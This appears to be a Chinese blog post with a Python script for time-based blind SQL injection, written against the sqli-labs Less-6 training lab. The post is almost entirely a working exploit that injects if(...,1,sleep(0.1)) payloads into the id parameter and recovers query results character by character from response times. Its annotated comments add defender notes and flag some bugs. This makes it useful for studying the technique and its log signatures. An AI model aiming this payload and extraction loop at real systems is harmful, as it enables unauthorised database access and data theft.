时间盲注其实和布尔盲注差不多,就是没回显值,不过可以用页面的返回时间判断sql语句的真假。去网上找了些脚本,都挺长的,就用之前的布尔盲注的脚本进行修改,把返回值改成返回时间就是了。不过sleep函数里的值挺麻烦的(休眠时间),太短会误判,太长又真的很花时间。在sqlilabs的第6关调了几次,好像0.1秒还可以,暂且先这样设吧。
import requests
import time
def check_res(start_time, end_time):
    """Classify one timed request by how long it took.

    Returns ``True`` when fewer than 0.1 seconds elapsed between
    ``start_time`` and ``end_time`` (the callers read that as "the injected
    condition was true, so ``sleep()`` did not run"), and ``False`` otherwise.

    The 0.1 s cut-off mirrors the ``sleep(0.1)`` the callers embed in the
    request; as the surrounding text notes it was tuned by hand, and ordinary
    network jitter can push a fast response over the line (false negative)
    or mask a slow one. That fragility is why timing-based probes need many
    near-identical requests, which is also what makes them stand out in
    access logs and latency metrics.
    """
    elapsed = end_time - start_time
    return elapsed < 0.1
def res_length(exp):
    """Infer the length of the string that SQL expression ``exp`` evaluates to.

    Each iteration sends one GET whose ``id`` parameter carries
    ``length((exp))>length`` wrapped in ``if(..., 1, sleep(0.1))`` and times
    the round trip; ``check_res`` turns the elapsed time into a yes/no. The
    loop stops at the first ``length`` whose response was slow (the sleep
    branch ran) and returns that value as an int.

    The target is the hard-coded sqli-labs Less-6 URL below (a deliberately
    vulnerable training app). There is no upper bound on the loop: if the
    server never produces a slow response (e.g. the injected query errors
    out), this never returns.
    """
    length = -1
    sess = requests.session()
    while True:
        # Condition probed on this iteration.
        sql_exp = "length((%s))>%d" % (exp,length)
        # The payload lives in the `id` query parameter and the answer is
        # carried by response latency, not by the page body. From a
        # defender's side that is the detectable signature: one parameter,
        # `if(`/`sleep(` in its value, many requests, bimodal response times.
        # The root cause on the server is string-built SQL; parameterised
        # queries remove the whole class.
        url = "http://sqli-labs-master/Less-6/?id=0\" or if((%s),1,sleep(0.1)) --+" % (sql_exp)
        start_time = time.time()
        res = sess.get(url)  # body is never inspected; `res` is unused
        end_time = time.time()
        print(time)  # NOTE(review): prints the `time` module object, not the elapsed time
        print(length)
        # Slow response => `length((exp)) > length` was false => done.
        if not check_res(start_time,end_time):
            break
        length += 1
    return length
def res_result(exp, length):
    """Recover ``length`` characters of the value of SQL expression ``exp``.

    For each position ``i`` a binary search over ASCII codes 0..127 is driven
    by timed requests: the injected condition is
    ``ascii(substr((exp), i+1, 1)) > mid`` and ``check_res`` (fast response
    => condition true) picks the half to keep. Roughly seven requests per
    character, all identical except for the position and comparison value --
    a high-volume, low-variance pattern in server logs.

    Returns the recovered string. Only codes up to 127 are representable;
    a character with code 0 would be reported as ``chr(1)`` because the
    search assumes the code is strictly greater than ``left``.
    """
    result = ""
    sess = requests.session()
    for i in range(length):
        left = 0
        right = 127
        while True:
            mid = (left+right) // 2
            if mid == left:
                # Interval collapsed to (left, right]; under the search
                # invariant (code > left and code <= right) the code is `right`.
                result += chr(right)
                break
            # substr() is 1-based, hence i+1.
            sql_exp = "ascii(substr((%s),%d,1))>%d" % (exp, i+1 , mid)
            # Same hard-coded sqli-labs Less-6 target as res_length.
            url = "http://sqli-labs-master/Less-6/?id=0\" or if((%s),1,sleep(0.1)) --+" % (sql_exp)
            start_time = time.time()
            res = sess.get(url)  # body unused; only the timing is read
            end_time = time.time()
            if check_res(start_time,end_time):
                left = mid    # fast response: code > mid
            else:
                right = mid   # slow response (sleep fired): code <= mid
    return result
if __name__ == '__main__':
    # Interactive driver: reads a SQL expression from stdin, prints the
    # inferred length and then the recovered value, and repeats forever
    # (there is no exit condition other than Ctrl-C / EOF).
    while True:
        exp = input(">>>请输入SQL语句:")
        length = res_length(exp)
        print("[+]length :%d" % (length))
        result = res_result(exp, length)
        print("[+]result:%s" % (result))